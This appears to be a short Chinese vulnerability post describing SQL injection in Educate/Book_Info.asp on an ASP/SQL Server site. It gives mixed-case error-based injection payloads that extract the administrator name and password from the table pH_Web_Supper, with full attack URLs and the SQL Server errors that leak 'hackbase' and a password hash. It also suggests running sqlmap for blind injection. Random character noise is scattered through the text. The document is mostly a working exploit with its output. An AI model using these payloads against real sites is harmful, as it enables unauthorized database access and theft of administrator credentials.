漏洞出现在Educate/Book_Info.asp
$ L! C6 r, [1 U% z2 P* L
4 k. @# B6 e1 n$ e* \此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出. Q& N1 O5 A- @
* [# Q( C" u: ?: H) |
exp:如下. I! L. z8 ?; o* K, ~9 r; W2 Y+ d; Q
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 N2 U9 ?+ {% j$ V3 ~" p H
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
- m# T5 N5 d$ x% o
4 D. |- e, {1 n# L+ Ihttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)9 K: _ ?5 [0 E+ F# S6 c
9 K3 Q( n( N9 Q- _5 v; {Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
2 s2 [3 W: N7 \8 G3 _ ! A* O9 N& n$ m& Z! O# S% N+ I, p
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。2 v2 `! b* \# s; k" y
2 {3 \7 e5 G z# r6 p
/Educate/Book_Info.asp,行 8# L8 M1 A( l" }7 F! n' Y
* o/ l/ U! G' \) p- Ehttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
4 B/ q0 v' ]0 h. p - R# f+ U& M# f# {8 C
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
4 p# \! J+ p- B. p5 O9 S
) L, o( ^4 A( m( P将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
( o; P) }5 g. H
3 N- N; H8 G0 J% u+ R/Educate/Book_Info.asp,行 8
9 `; y1 o6 I% A& a3 n- ]3 V |